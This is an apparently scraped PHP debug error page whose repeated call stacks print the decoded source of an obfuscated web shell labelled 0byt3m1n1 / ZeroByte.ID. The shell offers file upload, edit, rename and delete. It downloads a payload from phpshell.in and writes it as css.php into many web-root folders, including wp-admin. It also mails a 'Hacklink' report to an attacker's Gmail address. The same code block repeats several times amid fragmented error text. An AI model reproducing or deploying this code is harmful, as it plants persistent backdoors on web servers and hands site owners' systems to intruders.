'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2772540456fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:169
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 170
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2823540456fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:170
( ! ) Warning: mail(): Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set() in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 179
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2863540776mail ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:179
( ! ) Notice: Undefined index: query in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 182
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1
( ! ) Notice: Undefined variable: header in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 210
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
